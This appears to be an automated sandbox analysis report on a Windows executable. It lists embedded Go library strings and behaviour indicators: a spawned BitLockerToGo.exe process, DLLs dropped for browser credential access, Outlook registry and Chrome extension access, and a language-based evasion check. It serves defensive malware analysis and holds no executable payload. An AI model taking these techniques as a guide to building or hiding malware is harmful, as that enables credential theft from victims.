Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Operand).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Operand).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).Output
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ir.Instruction
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/errutil.AssertionFailure
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Linef
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).NL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Printf
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).SetError
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.NewTabWriter
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.New
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/internal/print.Printer
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/internal/print.TabWriter
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ast.Identifier.Precedence
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ast.(*Identifier).Precedence
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ast.Statement
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameBinaryValues
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameOperands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameBinaryRuns
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryRuns.NameOperands.func4
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryRuns.func2
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryValues.NameOperands.func3
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryValues.func1
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Compile
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/errutil.UnexpectedType
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Eval
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Func.Execute
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Exec
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Concat
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Exec.Concat.func1
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.CanonicalizeOperands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.(*Func).Execute
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigvector.init
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.init
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).CheckCitable
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).IsRelease
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseTime
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Title
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation.func2
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation.func1
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).RepositoryURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Module
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).DOIURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.doiurl
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*TabWriter).Flush
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Error
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Citation
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseTag
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ConceptDOIURL
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/meta.Properties
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: net/addrselect.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigint/bigint.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigints/bigints.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/chain.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/program.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/ir/ir.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/errutil/errutil.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/print/printer.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/ast/ast.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/naming.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/eval.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/pass.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigvector/bigvector.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/meta/meta.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/meta/cite.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/decred/dcrd/dcrec/secp256k1/v4@v4.0.1/loadprecomputed.go
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe File read: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
Source: unknown Process created: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe "C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe"
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntmarta.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mozglue.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wsock32.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vcruntime140.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msvcp140.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vcruntime140.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windowscodecs.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static file information: File size 15184384 > 1048576
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x663600
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x758000
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdb source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_02769860
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: section name: .symtab
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276B035 push ecx; ret 1_2_0276B048
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B536 push ecx; ret 1_2_6C82B549
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API coverage: 9.3 %
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275BE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_027516D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275F6B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02763EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_02763EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275DA80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0275E430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_02764910
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275DE10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_027638B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_02764570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0275ED20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02767ED0 GetSystemInfo,wsprintfA, 1_2_02767ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
